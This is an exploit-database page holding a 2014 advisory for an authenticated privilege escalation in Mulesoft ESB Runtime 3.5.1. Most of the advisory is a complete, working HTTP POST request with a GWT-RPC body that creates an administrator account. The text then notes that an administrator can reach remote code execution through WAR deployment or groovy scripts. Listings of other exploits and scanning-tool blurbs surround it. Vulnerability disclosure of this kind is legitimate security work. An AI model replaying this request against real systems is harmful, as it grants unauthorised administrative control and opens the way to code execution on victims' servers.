Menu

Search for hundreds of thousands of exploits

"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation"

Author

Exploit author

"Brandon Perry"

Platform

Exploit platform

jsp

Release date

Exploit published date

2014-10-27

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation  Remote Code
Execution



 Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.


 POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1

Host: 192.168.0.22:8585

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: text/x-gwt-rpc; charset=utf-8/

Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp

Content-Length: 503

Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4;

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

 7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/
|5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611|
fdsafdsa@fdsafdsa.com
|java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15|


 This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)" webapps jsp max7253
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal" webapps jsp max7253
2019-09-16 "NetGain EM Plus 10.1.68 - Remote Command Execution" webapps jsp azams
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
Release Date Title Type Platform Author
2015-04-29 "OS Solution OSProperty 2.8.0 - SQL Injection" webapps php "Brandon Perry"
2015-03-19 "Joomla! Component ECommerce-WD 1.2.5 - SQL Injection" webapps php "Brandon Perry"
2015-03-04 "SolarWinds Orion Service - SQL Injection" webapps windows "Brandon Perry"
2015-02-16 "eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities" webapps php "Brandon Perry"
2014-11-26 "Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)" webapps cgi "Brandon Perry"
2014-11-26 "Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)" webapps cgi "Brandon Perry"
2014-10-27 "Mulesoft ESB Runtime 3.5.1 - Privilege Escalation" webapps jsp "Brandon Perry"
2014-07-21 "Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)" webapps linux "Brandon Perry"
2014-05-19 "HP Release Control - (Authenticated) XML External Entity (Metasploit)" webapps windows "Brandon Perry"
2014-05-02 "F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)" remote hardware "Brandon Perry"
2014-04-15 "Xerox DocuShare - SQL Injection" webapps hardware "Brandon Perry"
2014-04-15 "Unitrends Enterprise Backup 7.3.0 - Root Remote Code Execution (Metasploit)" remote unix "Brandon Perry"
2014-04-01 "Alienvault 4.5.0 - (Authenticated) SQL Injection (Metasploit)" webapps php "Brandon Perry"
2014-03-31 "EMC Cloud Tiering Appliance 10.0 - XML External Entity Arbitrary File Read (Metasploit)" webapps multiple "Brandon Perry"
2014-03-22 "LifeSize UVC 1.2.6 - (Authenticated) Remote Code Execution" webapps php "Brandon Perry"
2014-03-19 "McAfee Asset Manager 6.6 - Multiple Vulnerabilities" webapps jsp "Brandon Perry"
2005-08-10 "Gaim AIM/ICQ Protocols - Multiple Vulnerabilities" dos windows "Brandon Perry" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected